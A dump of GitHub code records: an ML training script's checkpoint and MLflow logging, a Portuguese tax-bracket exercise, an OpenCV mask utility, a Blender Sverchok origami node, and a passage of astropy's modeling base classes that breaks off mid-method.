ignore_errors=True)\r\n else:\r\n try:\r\n model.load_state_dict(torch.load(args.load_weights)[\"state_dict\"])\r\n tmpdir = Path(tempfile.mkdtemp())\r\n shutil.copy(args.load_weights, tmpdir / \"init_weights.ckpt\")\r\n mlflow_client.log_artifact(logger.run_id, tmpdir / \"init_weights.ckpt\")\r\n shutil.rmtree(tmpdir, ignore_errors=True)\r\n except FileNotFoundError:\r\n print(f\"{args.load_weights} is neither a valid run id or a path to a .ckpt\")\r\n return\r\n\r\n # handle checkpoints\r\n if (\r\n args.train.epochs is None\r\n or args.train.epochs == 1\r\n and 
args.train.steps is not None\r\n and args.train.steps > 0\r\n ):\r\n ckpt_callback = ModelCheckpoint(\r\n outpath / \"ckpts\",\r\n train_time_interval=timedelta(hours=2),\r\n save_last=True,\r\n )\r\n else:\r\n ckpt_callback = ModelCheckpoint(outpath / \"ckpts\", save_last=True)\r\n\r\n remove_output = True\r\n\r\n class HandleOutputs(Callback):\r\n def on_train_end(self, trainer, pl_module):\r\n\r\n # save final model\r\n print(\"saving the final model.\")\r\n torch.save(\r\n {\"global_step\": trainer.global_step, \"state_dict\": pl_module.state_dict()},\r\n outpath / \"model.ckpt\",\r\n )\r\n\r\n # copy the model and the params on MLFlow\r\n if not args.fast_dev_run:\r\n mlflow_client: MlflowClient = logger.experiment\r\n\r\n # store diff file if needed\r\n try:\r\n repo = Repo(Path.cwd())\r\n\r\n if repo.is_dirty():\r\n try:\r\n out = subprocess.check_output([\"git\", \"diff\"], cwd=Path.cwd())\r\n if out is not None:\r\n tmpfile = Path(tempfile.mkdtemp()) / \"changes.diff\"\r\n with open(tmpfile, \"wb\") as f:\r\n f.write(out)\r\n mlflow_client.log_artifact(logger.run_id, tmpfile)\r\n os.remove(tmpfile)\r\n except subprocess.CalledProcessError as e:\r\n print(\"Failed to save a diff file of the current experiment\")\r\n\r\n except InvalidGitRepositoryError:\r\n pass\r\n\r\n # save the model\r\n mlflow_client.log_artifact(logger.run_id, str(outpath / \"model.ckpt\"))\r\n\r\n # finally, remove the temp output and log in a hidden file the current run\r\n # for the eval step\r\n with open(\".current_run.yaml\", \"wt\") as f:\r\n yaml.safe_dump(\r\n {\"experiment\": logger.experiment_id, \"run_uuid\": logger.run_id}, f\r\n )\r\n\r\n def on_keyboard_interrupt(self, trainer, pl_module):\r\n print(\"training interrupted\")\r\n\r\n # (not removing checkpoints)\r\n nonlocal remove_output\r\n remove_output = False\r\n\r\n # init train\r\n trainer_params = {\r\n \"gpus\": args.gpus,\r\n \"fast_dev_run\": args.fast_dev_run,\r\n \"logger\": logger,\r\n \"benchmark\": True,\r\n \"callbacks\": [ckpt_callback, HandleOutputs()],\r\n \"weights_summary\": None,\r\n \"resume_from_checkpoint\": ckpt_path,\r\n \"num_sanity_val_steps\": 0,\r\n }\r\n\r\n if (\r\n args.resume_from_checkpoint is not False\r\n and args.train.epochs is not None\r\n and args.train.epochs == 1\r\n and args.train.steps is not None\r\n and args.train.steps > 0\r\n and ckpt_path is not None\r\n ):\r\n args.train.epochs = None\r\n\r\n if args.train.epochs is not None:\r\n trainer_params[\"max_epochs\"] = args.train.epochs\r\n if args.train.steps is not None:\r\n trainer_params[\"max_steps\"] = args.train.steps\r\n if args.limit_train_batches is not None:\r\n trainer_params[\"limit_train_batches\"] = args.limit_train_batches\r\n if args.limit_val_batches is not None:\r\n trainer_params[\"limit_val_batches\"] = args.limit_val_batches\r\n\r\n trainer = pl.Trainer(**trainer_params)\r\n trainer.fit(model, data_module)\r\n\r\n if remove_output:\r\n shutil.rmtree(outpath)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_training()\r\n","repo_name":"andreaconti/multi-view-guided-multi-view-stereo","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"36810200804","text":"\n# ler salario anual\nsalario=float(input(\"Insira o salário anual: \"))\n\n# condição para pagar 20% taxa\nif(salario<=15000):\n imposto = salario * 0.2\n print(\"Paga taxa de 20 porcento:\", imposto, \"€\")\n\n# condição para pagar 
30% taxa\nif(salario>15000 and salario<=20000):\n imposto = salario * 0.3\n print(\"Paga taxa de 30 porcento:\", imposto, \"€\")\n\n# condição para pagar 35% taxa\nif(salario>20000 and salario<=25000):\n imposto = salario * 0.35\n print(\"Paga taxa de 35 porcento:\", imposto, \"€\")\n\n# condição para pagar 40% taxa\nif(salario>25000):\n imposto = salario * 0.4\n print(\"Paga taxa de 40 porcento:\", imposto, \"€\")","repo_name":"Vmvs007/CESAE_AWSRestart","sub_path":"pythonProject/FichaPratica02/Ex_03.py","file_name":"Ex_03.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894380001","text":"import numpy as np\nimport cv2 as cv\n\n\n# find the projector FOV mask\ndef thresh(im_in):\n # threshold im_diff with Otsu's method\n if im_in.ndim == 3:\n im_in = cv.cvtColor(im_in, cv.COLOR_BGR2GRAY)\n if im_in.dtype == 'float32':\n im_in = np.uint8(im_in * 255)\n _, im_mask = cv.threshold(cv.GaussianBlur(im_in, (5, 5), 0), 0, 255, cv.THRESH_BINARY + cv.THRESH_OTSU)\n im_mask = im_mask > 0\n\n # find the largest contour by area then convert it to convex hull\n im_contours, contours, hierarchy = cv.findContours(np.uint8(im_mask), cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n hulls = cv.convexHull(max(contours, key=cv.contourArea))\n im_mask = cv.fillConvexPoly(np.zeros_like(im_mask, dtype=np.uint8), hulls, True) > 0\n\n # also calculate the bounding box\n bbox = cv.boundingRect(max(contours, key=cv.contourArea))\n corners = [[bbox[0], bbox[1]], [bbox[0] + bbox[2], bbox[1]], [bbox[0] + bbox[2], bbox[1] + bbox[3]], [bbox[0], bbox[1] + bbox[3]]]\n\n # normalize to (-1, 1) following pytorch grid_sample coordinate system\n h = im_in.shape[0]\n w = im_in.shape[1]\n\n for pt in corners:\n pt[0] = 2 * (pt[0] / w) - 1\n pt[1] = 2 * (pt[1] / h) - 1\n\n return im_mask, corners\n","repo_name":"BingyaoHuang/CompenNet-plusplus","sub_path":"src/python/ImgProc.py","file_name":"ImgProc.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"37777196690","text":"import bpy\nfrom bpy.props import IntProperty, FloatProperty\nfrom sverchok.data_structure import updateNode, match_long_repeat\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.utils.rigid_origami_utils import ObjectParams, \\\n\t\tCreaseLines, InsideVertex, FoldAngleCalculator, FaceRotation\nfrom sverchok.utils.nodes_mixins.sockets_config import TransformNode\n\n\nclass SvRigidOrigamiNode(TransformNode, SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: Rigid Origami\n Tooltip: Fold a paper like a rigid origami\n \"\"\"\n\n bl_idname = 'SvRigidOrigamiNode'\n bl_label = 'Rigid Origami'\n bl_icon = 'OUTLINER_OB_EMPTY'\n sv_icon = 'SV_ORIGAMI'\n\n folding_ratio : FloatProperty(\n name=\"Folding ratio\",\n description=\"Folding ratio from 0.0 to 1.0\",\n default=0.0,\n min=0.0, max=1.0,\n update=updateNode)\n\n division_count : IntProperty(\n name=\"Division count\",\n description=\"Count of dividing angles to calculate precisely\",\n default=20,\n min=1, max=100,\n update=updateNode)\n\n fixed_face_index : IntProperty(\n name=\"Fixed face index\",\n description=\"Index of fixed face when folding\",\n default=0,\n update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvVerticesSocket', 'Vertices')\n self.inputs.new('SvStringsSocket', 'Edges')\n self.inputs.new('SvStringsSocket', 'Faces')\n\n 
self.inputs.new('SvStringsSocket', 'Fold edge indices')\n self.inputs.new('SvStringsSocket', 'Fold edge angles')\n\n self.inputs.new('SvStringsSocket', 'Folding ratio').prop_name = 'folding_ratio'\n self.inputs.new('SvStringsSocket', 'Division count').prop_name = 'division_count'\n self.inputs.new('SvStringsSocket', 'Fixed face index').prop_name = 'fixed_face_index'\n\n self.outputs.new('SvVerticesSocket', 'Vertices')\n\n def process(self):\n if not any(socket.is_linked for socket in self.outputs):\n return\n \n if not self.inputs['Fold edge indices'].is_linked \\\n or not self.inputs['Fold edge angles'].is_linked:\n return\n \n verts_in = self.inputs['Vertices'].sv_get()\n edges_in = self.inputs['Edges'].sv_get()\n faces_in = self.inputs['Faces'].sv_get()\n\n fold_edge_indices = self.inputs['Fold edge indices'].sv_get()\n fold_edge_angles = self.inputs['Fold edge angles'].sv_get()\n\n folding_ratio = self.inputs['Folding ratio'].sv_get()\n division_count = self.inputs['Division count'].sv_get()\n fixed_face_index = self.inputs['Fixed face index'].sv_get()\n\n meshes = match_long_repeat([verts_in, edges_in, faces_in, \\\n fold_edge_indices, fold_edge_angles, folding_ratio, \\\n division_count, fixed_face_index])\n\n verts_out = []\n for verts, edges, faces, edge_indices, edge_angles, \\\n folding, step, fixed_face in zip(*meshes):\n\n if isinstance(folding, (list, tuple)):\n folding = folding[0]\n if isinstance(step, (list, tuple)):\n step = step[0]\n if isinstance(fixed_face, (list, tuple)):\n fixed_face = fixed_face[0]\n\n verts_o = verts\n try:\n # Wrap object\n obj = ObjectParams(verts, edges, faces)\n\n # Extract crease lines\n crease_lines = CreaseLines(obj, edge_indices, edge_angles, folding)\n\n if edge_indices:\n # Extract inside vertices\n inside_vertices = InsideVertex.generate_inside_vertices( \\\n obj, crease_lines)\n # Calculation loop to determine the final angles\n FoldAngleCalculator.calc_fold_angle(step, crease_lines, inside_vertices)\n\n crease_lines.delta_angles = [cur_rho - angle for cur_rho, angle \\\n in zip(FoldAngleCalculator.current_rhos, crease_lines.angles)]\n\n # Rotate each faces using final angles\n FaceRotation.obj = obj\n FaceRotation.inside_vertices = inside_vertices\n FaceRotation.crease_lines = crease_lines\n FaceRotation.fixed_face_index = int(fixed_face)\n verts_o = FaceRotation.rotate_faces()\n\n verts_out.append(verts_o)\n finally:\n if obj is not None:\n obj.free()\n\n self.outputs['Vertices'].sv_set(verts_out)\n\ndef register():\n bpy.utils.register_class(SvRigidOrigamiNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvRigidOrigamiNode)\n","repo_name":"nortikin/sverchok","sub_path":"nodes/modifier_change/rigid_origami.py","file_name":"rigid_origami.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"16874279996","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nThis module defines base classes for all models.\nThe base class of all models is `~astropy.modeling.Model`.\n`~astropy.modeling.ParametricModel` is the base class for all fittable models. Parametric\nmodels can be linear or nonlinear in a regression analysis sense.\n\nAll models provide a `__call__` method which performs the transformation in a\npurely mathematical way, i.e. the models are unitless. 
In addition, when\npossible the transformation is done using multiple parameter sets, `param_sets`.\nThe number of parameter sets is stored in an attribute `param_dim`.\n\nParametric models also store a flat list of all parameters as an instance of\n`~astropy.modeling.parameters.Parameters`. When fitting, this list-like object is modified by a\nsubclass of `~astropy.modeling.fitting.Fitter`. When fitting nonlinear models, the values of the\nparameters are used as initial guesses by the fitting class. Normally users\nwill not have to use the `~astropy.modeling.parameters` module directly.\n\nInput Format For Model Evaluation and Fitting\n\nInput coordinates are passed in separate arguments, for example 2D models\nexpect x and y coordinates to be passed separately as two scalars or aray-like\nobjects.\nThe evaluation depends on the input dimensions and the number of parameter\nsets but in general normal broadcasting rules apply.\nFor example:\n\n- A model with one parameter set works with input in any dimensionality\n\n- A model with N parameter sets works with 2D arrays of shape (M, N).\n A parameter set is applied to each column.\n\n- A model with N parameter sets works with multidimensional arrays if the\n shape of the input array is (N, M, P). A parameter set is applied to each plane.\n\nIn all these cases the output has the same shape as the input.\n\n- A model with N parameter sets works with 1D input arrays. The shape\n of the output is (M, N)\n\n\"\"\"\nfrom __future__ import division, print_function\nimport abc\nfrom ..utils.compat.odict import OrderedDict\nimport numpy as np\nfrom . import parameters\nfrom . import constraints\nfrom .utils import InputParameterError\n\n__all__ = ['Model', 'ParametricModel', 'PCompositeModel', 'SCompositeModel',\n 'LabeledInput', '_convert_input', '_convert_output']\n\n\ndef _convert_input(x, pdim):\n \"\"\"\n Format the input into appropriate shape\n\n Parameters\n ----------\n x : scalar, array or a sequence of numbers\n input data\n pdim : int\n number of parameter sets\n\n The meaning of the internally used format is:\n\n 'N' - the format of the input was not changed\n 'T' - input was transposed\n 'S' - input is a scalar\n \"\"\"\n x = np.asarray(x) + 0.\n fmt = 'N'\n if pdim == 1:\n if x.ndim == 0:\n fmt = 'S'\n return x, fmt\n else:\n return x, fmt\n else:\n if x.ndim < 2:\n fmt = 'N'\n return np.array([x]).T, fmt\n elif x.ndim == 2:\n assert x.shape[-1] == pdim, \"Cannot broadcast with shape\"\\\n \"({0}, {1})\".format(x.shape[0], x.shape[1])\n return x, fmt\n elif x.ndim > 2:\n assert x.shape[0] == pdim, \"Cannot broadcast with shape \" \\\n \"({0}, {1}, {2})\".format(x.shape[0], x.shape[1], x.shape[2])\n fmt = 'T'\n return x.T, fmt\n\n\ndef _convert_output(x, fmt):\n \"\"\"\n Put the output in the shpae/type of the original input\n\n Parameters\n ----------\n x : scalar, array or a sequence of numbers\n output data\n fmt : string\n original format\n \"\"\"\n if fmt == 'N':\n return x\n elif fmt == 'T':\n return x.T\n elif fmt == 'S':\n return x[0]\n else:\n raise ValueError(\"Unrecognized output conversion format\")\n\n\nclass _ParameterProperty(object):\n\n \"\"\"\n Create a property for a parameter.\n\n Parameters\n ----------\n name: string\n the name of the parameter\n\n \"\"\"\n def __init__(self, name):\n self.aname = '_' + name\n self.name = name\n\n def __get__(self, obj, objtype):\n par = getattr(obj, self.aname)\n return par\n\n def __set__(self, obj, val):\n if self.name in obj._parcheck:\n obj._parcheck[self.name](val)\n if 
isinstance(obj, ParametricModel):\n if not obj._parameters._changed:\n par = parameters.Parameter(self.name, val, obj, obj.param_dim)\n oldpar = getattr(obj, self.name)\n if oldpar is not None and oldpar.parshape != par.parshape:\n raise InputParameterError(\n \"Input parameter {0} does not \"\n \"have the required shape\".format(self.name))\n else:\n setattr(obj, self.aname, par)\n obj._parameters = parameters.Parameters(obj,\n obj.param_names,\n param_dim=obj.param_dim)\n else:\n setattr(obj, self.aname, val)\n else:\n par = parameters.Parameter(self.name, val, obj, obj.param_dim)\n oldpar = getattr(obj, self.name)\n if oldpar is not None and oldpar.parshape != par.parshape:\n raise InputParameterError(\n \"Input parameter {0} does not \"\n \"have the required shape\".format(self.name))\n else:\n setattr(obj, self.aname, par)\n\n\nclass Model(object):\n\n \"\"\"\n Base class for all models.\n\n This is an abstract class and should not be instanciated.\n\n Notes\n -----\n Models which are not meant to be fit to data should subclass this class\n\n This class sets the properties for all individual parameters and performs\n parameter validation.\n\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n param_names = []\n\n def __init__(self, param_names, n_inputs, n_outputs, param_dim=1):\n self._param_dim = param_dim\n self._n_inputs = n_inputs\n self._n_outputs = n_outputs\n self.has_inverse = False\n self._param_names = param_names\n #_parcheck is a dictionary to register parameter validation funcitons\n # key: value pairs are parameter_name: parameter_validation_function_name\n # see projections.AZP for example\n self._parcheck = {}\n for par in param_names:\n setattr(self.__class__, par, _ParameterProperty(par))\n\n @property\n def n_inputs(self):\n \"\"\"\n Number of input variables in model evaluation.\n \"\"\"\n return self._n_inputs\n\n @property\n def n_outputs(self):\n \"\"\"\n Number of output variables returned when a model is evaluated.\n \"\"\"\n return self._n_outputs\n\n @property\n def param_dim(self):\n \"\"\"\n Number of parameter sets in a model.\n \"\"\"\n return self._param_dim\n\n @param_dim.setter\n def param_dim(self, val):\n \"\"\"\n Set the number of parameter sets in a model.\n \"\"\"\n self._param_dim = val\n\n @property\n def param_names(self):\n \"\"\"\n A list of names of the parameters defining a model.\n \"\"\"\n return self._param_names\n\n @param_names.setter\n def param_names(self, val):\n self._param_names = val\n\n def __repr__(self):\n fmt = \"{0}(\".format(self.__class__.__name__)\n for i in range(len(self.param_names)):\n fmt1 = \"\"\"\n {0}={1},\n \"\"\".format(self.param_names[i], getattr(self, self.param_names[i]))\n fmt += fmt1\n fmt += \")\"\n\n return fmt\n\n def __str__(self):\n\n fmt = \"\"\"\n Model: {0}\n Parameter sets: {1}\n Parameters:\n {2}\n \"\"\".format(\n self.__class__.__name__,\n self.param_dim,\n \"\\n \".join(i + ': ' +\n str(self.__getattribute__(i)) for i in self.param_names)\n )\n\n return fmt\n\n @property\n def param_sets(self):\n \"\"\"\n Return parameters as a pset.\n This is an array where each column represents one parameter set.\n \"\"\"\n parameters = [getattr(self, attr) for attr in self.param_names]\n shapes = [par.parshape for par in parameters]\n lenshapes = np.asarray([len(p.parshape) for p in parameters])\n shapes = [p.parshape for p in parameters]\n if (lenshapes > 1).any():\n if () in shapes:\n psets = np.asarray(parameters, dtype=np.object)\n else:\n psets = np.asarray(parameters)\n else:\n psets = 
np.asarray(parameters)\n psets.shape = (len(self.param_names), self.param_dim)\n return psets\n\n def inverse(self):\n \"\"\"\n Return a callable object which does the inverse transform\n \"\"\"\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def invert(self):\n \"\"\"\n Invert coordinates iteratively if possible\n \"\"\"\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def add_model(self, newtr, mode):\n \"\"\"\n Create a CompositeModel by chaining the current model with the new one\n using the specified mode.\n\n Parameters\n ----------\n newtr : an instance of a subclass of Model\n mode : string\n 'parallel', 'serial', 'p' or 's'\n a flag indicating whether to combine the models\n in series or in parallel\n\n Returns\n -------\n model : CompositeModel\n an instance of CompositeModel\n \"\"\"\n if mode in ['parallel', 'p']:\n return PCompositeModel([self, newtr])\n elif mode in ['serial', 's']:\n return SCompositeModel([self, newtr])\n else:\n raise InputParameterError(\"Unrecognized mode {0}\".format(mode))\n\n @abc.abstractmethod\n def __call__(self):\n raise NotImplementedError(\"Subclasses should implement this\")\n\n\nclass ParametricModel(Model):\n\n \"\"\"\n Base class for all fittable models.\n\n Notes\n -----\n All models which can be fit to data and provide a `deriv` method\n should subclass this class.\n\n Sets the parameters attributes.\n\n Parameters\n ----------\n param_names: list\n parameter names\n n_inputs: int\n number of inputs\n n_outputs: int\n number of output quantities\n param_dim: int\n number of parameter sets\n fittable: boolean\n indicator if the model is fittable\n fixed: a dict\n a dictionary {parameter_name: boolean} of parameters to not be\n varied during fitting. True means the parameter is held fixed.\n Alternatively the `~astropy.modeling.parameters.Parameter.fixed`\n property of a parameter may be used.\n tied: dict\n a dictionary {parameter_name: callable} of parameters which are\n linked to some other parameter. The dictionary values are callables\n providing the linking relationship.\n Alternatively the `~astropy.modeling.parameters.Parameter.tied`\n property of a parameter may be used.\n bounds: dict\n a dictionary {parameter_name: boolean} of lower and upper bounds of\n parameters. Keys are parameter names. 
Values are a list of length\n 2 giving the desired range for the parameter.\n Alternatively the `~astropy.modeling.parameters.Parameter.min` and\n `~astropy.modeling.parameters.Parameter.max` properties of a parameter\n may be used.\n eqcons: list\n A list of functions of length n such that\n eqcons[j](x0,*args) == 0.0 in a successfully optimized\n problem.\n ineqcons : list\n A list of functions of length n such that\n ieqcons[j](x0,*args) >= 0.0 is a successfully optimized\n problem.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, param_names, n_inputs, n_outputs, param_dim=1, fittable=True,\n fixed=None, tied=None, bounds=None, eqcons=None, ineqcons=None):\n self.linear = True\n super(ParametricModel, self).__init__(param_names, n_inputs, n_outputs, param_dim=param_dim)\n self.fittable = fittable\n self._parameters = parameters.Parameters(self, self.param_names,\n param_dim=param_dim)\n # Initialize the constraints for each parameter\n _fixed = {}.fromkeys(self.param_names, False)\n _tied = {}.fromkeys(self.param_names, False)\n _bounds = {}.fromkeys(self.param_names, [-1.E12, 1.E12])\n if eqcons is None:\n eqcons = []\n if ineqcons is None:\n ineqcons = []\n self.constraints = constraints.Constraints(self, fixed=_fixed,\n tied=_tied,\n bounds=_bounds,\n eqcons=eqcons,\n ineqcons=ineqcons)\n # Set constraints\n if fixed:\n for name in fixed:\n par = getattr(self, name)\n setattr(par, 'fixed', fixed[name])\n if tied:\n for name in tied:\n par = getattr(self, name)\n setattr(par, 'tied', tied[name])\n if bounds:\n for name in bounds:\n par = getattr(self, name)\n setattr(par, 'min', bounds[name][0])\n setattr(par, 'max', bounds[name][1])\n\n def __repr__(self):\n try:\n degree = str(self.deg)\n except AttributeError:\n degree = \"\"\n try:\n param_dim = str(self.param_dim)\n except AttributeError:\n param_dim = \" \"\n\n if degree:\n fmt = \"<{0}({1},\".format(self.__class__.__name__, repr(self.deg))\n else:\n fmt = \"<{0}(\".format(self.__class__.__name__)\n for i in range(len(self.param_names)):\n fmt1 = \"\"\"\n {0}={1},\n \"\"\".format(self.param_names[i], getattr(self, self.param_names[i]))\n fmt += fmt1.strip()\n if param_dim:\n fmt += \"param_dim={0})>\".format(self.param_dim)\n\n return fmt\n\n def __str__(self):\n try:\n degree = str(self.deg)\n except AttributeError:\n degree = 'N/A'\n fmt = \"\"\"\n Model: {0}\n Dim: {1}\n Degree: {2}\n Parameter sets: {3}\n Parameters:\n {4}\n \"\"\".format(\n self.__class__.__name__,\n self.n_inputs,\n degree,\n self.param_dim,\n \"\\n \".join(i + ': ' +\n str(self.__getattribute__(i)) for i in self.param_names)\n )\n\n return fmt\n\n @property\n def parameters(self):\n \"\"\"\n An instance of `~astropy.modeling.parameters.Parameters`.\n Fittable parameters maintain this list and fitters modify it.\n \"\"\"\n return self._parameters\n\n @parameters.setter\n def parameters(self, value):\n \"\"\"\n Reset the parameters attribute as an instance of\n `~astropy.modeling.parameters.Parameters`\n \"\"\"\n if isinstance(value, parameters.Parameters):\n if self._parameters._is_same_length(value):\n self._parameters = value\n else:\n raise InputParameterError(\n \"Expected the list of parameters to be the same \"\n \"length as the initial list.\")\n elif isinstance(value, (list, np.ndarray)):\n _val = parameters._tofloat(value)[0]\n if self._parameters._is_same_length(_val):\n self._parameters._changed = True\n self._parameters[:] = _val\n else:\n raise InputParameterError(\n \"Expected the list of parameters to be the same \"\n \"length 
as the initial list.\")\n else:\n raise TypeError(\"Parameters must be of type 'list' or 'Parameters'\")\n\n def set_joint_parameters(self, jpars):\n \"\"\"\n Used by the JointFitter class to store parameters which are\n considered common for several models and are to be fitted together.\n \"\"\"\n self.joint = jpars\n\n\nclass LabeledInput(dict):\n\n \"\"\"\n Create a container with all input data arrays, assigning labels for\n each one.\n\n Used by CompositeModel to choose input data using labels\n\n Parameters\n ----------\n data : list\n a list of all input data\n labels : list of strings\n names matching each coordinate in data\n\n Returns\n -------\n data : LabeledData\n a dict of input data and their assigned labels\n\n Examples\n --------\n >>> x,y = np.mgrid[:10, :10]\n >>> l = np.arange(10)\n >>> ado = LabeledInput([x, y, l], ['x', 'y', 'pixel'])\n >>> ado.x\n array([[0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4]])\n >>> ado['x']\n array([[0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4]])\n\n \"\"\"\n def __init__(self, data, labels):\n dict.__init__(self)\n assert len(labels) == len(data)\n self.labels = [l.strip() for l in labels]\n for coord, label in zip(data, labels):\n self[label] = coord\n setattr(self, '_' + label, coord)\n self._set_properties(self.labels)\n\n def _getlabel(self, name):\n par = getattr(self, '_' + name)\n return par\n\n def _setlabel(self, name, val):\n setattr(self, '_' + name, val)\n self[name] = val\n\n def _dellabel(self, name):\n delattr(self, '_' + name)\n del self[name]\n\n def add(self, label=None, value=None, **kw):\n \"\"\"\n Add input data to a LabeledInput object\n\n Parameters\n --------------\n label : string\n coordinate label\n value : numerical type\n coordinate value\n kw : dictionary\n if given this is a dictionary of {label: value} pairs\n\n \"\"\"\n if kw:\n if label is None or value is None:\n self.update(kw)\n else:\n kw[label] = value\n self.update(kw)\n else:\n kw = dict({label: value})\n assert(label is not None and value is not None), (\n \"Expected label and value to be defined\")\n self[label] = value\n\n for key in kw:\n self.__setattr__('_' + key, kw[key])\n self._set_properties(kw.keys())\n\n def _set_properties(self, attributes):\n for attr in attributes:\n setattr(self.__class__, attr, property(lambda self, attr=attr:\n self._getlabel(attr),\n lambda self, value, attr=attr:\n self._setlabel(attr, value),\n lambda self, attr=attr:\n self._dellabel(attr)\n )\n )\n\n def copy(self):\n data = [self[label] for label in self.labels]\n return LabeledInput(data, self.labels)\n\n\nclass _CompositeModel(OrderedDict):\n\n def __init__(self, transforms, inmap=None, outmap=None):\n \"\"\"\n A Base class for all composite models.\n\n \"\"\"\n OrderedDict.__init__(self)\n self.n_inputs = None\n self.n_outputs = None\n self.fittable = False\n self.has_inverse = np.array([tr.has_inverse for tr in transforms]).all()\n\n def _init_comptr(self, trans, inmap, outmap):\n # implemented by subclasses\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def __repr__(self):\n transforms = self.keys()\n fmt = \"\"\"\n Model: {0}\n \"\"\".format(self.__class__.__name__)\n fmt1 = \" %s \" * len(transforms) % tuple([repr(tr) for tr in transforms])\n fmt = fmt + fmt1\n return fmt\n\n def __str__(self):\n transforms = self.keys()\n fmt = \"\"\"\n Model: {0}\n \"\"\".format(self.__class__.__name__)\n fmt1 = \" %s \" * len(transforms) % tuple([str(tr) 
for tr in transforms])\n fmt = fmt + fmt1\n return fmt\n\n def add_model(self, transf, inmap, outmap):\n self[transf] = [inmap, outmap]\n\n def invert(self):\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def __call__(self):\n # implemented by subclasses\n raise NotImplementedError(\"Subclasses should implement this\")\n\n\nclass SCompositeModel(_CompositeModel):\n\n \"\"\"\n\n Execute models in series.\n\n Parameters\n ----------\n transforms : list\n a list of transforms in the order to be executed\n inmap : list of lists or None\n labels in an input instance of LabeledInput\n if None, the number of input coordinates is exactly what\n the transforms expect\n outmap : list or None\n labels in an input instance of LabeledInput\n if None, the number of output coordinates is exactly what\n the transforms expect\n\n Returns\n -------\n model : SCompositeModel\n Composite model which executes the comprising models in series\n\n Notes\n -----\n Output values of one model are used as input values of another.\n Obviously the order of the models matters.\n\n Examples\n --------\n Apply a 2D rotation followed by a shift in x and y::\n\n >>> from astropy.modeling import *\n >>> rot = models.MatrixRotation2D(angle=23.5)\n >>> offx = models.ShiftModel(-4.23)\n >>> offy = models.ShiftModel(2)\n >>> linp = LabeledInput([x, y], [\"x\", \"y\"])\n >>> scomptr = SCompositeModel([rot, offx, offy],\n ... inmap=[['x', 'y'], ['x'], ['y']],\n ... outmap=[['x', 'y'], ['x'], ['y']])\n >>> result=scomptr(linp)\n\n \"\"\"\n def __init__(self, transforms, inmap=None, outmap=None):\n super(SCompositeModel, self).__init__(transforms, inmap, outmap)\n if transforms and inmap and outmap:\n assert len(transforms) == len(inmap) == len(outmap), \\\n \"Expected sequences of transform, \" \\\n \"inmap and outmap to have the same length\"\n if inmap is None:\n inmap = [None] * len(transforms)\n if outmap is None:\n outmap = [None] * len(transforms)\n\n self._init_comptr(transforms, inmap, outmap)\n self.n_inputs = np.array([tr.n_inputs for tr in self]).max()\n # the output dimension is equal to the output dim of the last transform\n self.n_outputs = self.keys()[-1].n_outputs\n\n def _init_comptr(self, transforms, inmap, outmap):\n for tr, inm, outm in zip(transforms, inmap, outmap):\n self[tr] = [inm, outm]\n\n def _verify_no_mapper_input(self, *data):\n lendata = len(data)\n tr = self.keys()[0]\n\n if tr.n_inputs != lendata:\n\n raise ValueError(\"Required number of coordinates not matched for \"\n \"transform # {0}: {1} required, {2} supplied \".format(\n self.keys().index(tr) + 1, tr.n_inputs, lendata))\n\n def invert(self, inmap, outmap):\n scomptr = SCompositeModel(self[::-1], inmap=inmap, outmap=outmap)\n return scomptr\n\n def __call__(self, x, *data):\n \"\"\"\n Transforms data using this model.\n \"\"\"\n lendata = len(data) + 1\n if lendata == 1:\n if not isinstance(x, LabeledInput):\n data = np.asarray(x, dtype=np.float64)\n self._verify_no_mapper_input(data)\n result = data\n for tr in self:\n result = tr(result)\n return result\n else:\n linp = x.copy()\n # we want to return the entire labeled object because some parts\n # of it may not be used in another transform of which this\n # one is a component\n for tr in self:\n inmap = self[tr][0]\n outmap = self[tr][1]\n inlist = [getattr(linp, co) for co in inmap]\n result = tr(*inlist)\n if tr.n_outputs == 1:\n result = [result]\n for outcoo, res in zip(outmap, result):\n if outcoo not in inmap:\n linp.add(outcoo, res)\n else:\n linp[outcoo] = 
res\n setattr(linp, outcoo, res)\n return linp\n else:\n inlist = [x]\n inlist.extend(data)\n self._verify_no_mapper_input(*inlist)\n result = self.keys()[0](*inlist)\n for tr in self.keys()[1:]:\n result = tr(result)\n return result\n\n\nclass PCompositeModel(_CompositeModel):\n\n \"\"\"\n\n Execute models in parallel.\n\n Parameters\n --------------\n transforms : list\n transforms to be executed in parallel\n inmap : list or None\n labels in an input instance of LabeledInput\n if None, the number of input coordinates is exactly what the\n transforms expect\n\n Returns\n -------\n model : PCompositeModel\n Composite model which executes the comprising models in parallel\n\n Notes\n -----\n Models are applied to input data separately and the deltas are summed.\n\n \"\"\"\n def __init__(self, transforms, inmap=None, outmap=None):\n super(PCompositeModel, self).__init__(transforms, inmap=None, outmap=None)\n self._init_comptr(transforms, inmap, outmap)\n self.n_inputs = self.keys()[0].n_inputs\n self.n_outputs = self.n_inputs\n self.inmap = inmap\n self.outmap = outmap\n\n def _init_comptr(self, transforms, 